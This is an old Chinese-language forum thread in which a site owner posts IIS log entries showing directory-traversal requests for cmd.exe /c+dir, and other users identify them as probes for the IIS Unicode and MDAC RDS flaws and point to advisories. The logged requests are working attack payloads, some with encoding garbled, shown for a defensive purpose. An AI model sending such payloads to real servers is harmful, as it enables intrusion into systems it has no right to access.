logfile

[linyuson]

我網站上的logfile 記載如下,看內容好像是有人在網站上使用DOS指令!不知是否有害網站動作? ---謝 謝!!---
2001-06-12 21:17:57 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..嶸../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:17:59 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:00 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..epc../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:02 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:03 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:05 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..e8s../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:06 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:08 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:09 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..蟒../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:10 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:12 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..??./winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:13 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..??./winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:14 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /scripts/..??./winnt/system32/cmd.exe /c+dir 404 -
2001-06-12 21:18:16 202.181.210.4 - xxx.xxx.xxx.xxx 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 -

[winson]

他只是想要try你iis的漏洞罷了

請你往前面的文章搜尋...

[shinn]

沒錯哦，對方正在試圖入侵你的電腦.
入侵的對象是 IIS.使用的方法請看下列網址.
Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability http://www.securityfocus.com/vdb/?id=1806
NT IIS MDAC RDS Vulnerability http://www.securityfocus.com/vdb/?id=529
你可以找一些 Unicode 的 Attack script 試試看，如果系統還有漏洞，趕快做修補吧...
對了，參考一下這一篇
http://pczone.jimmytam.com/showthread.php?threadid=7979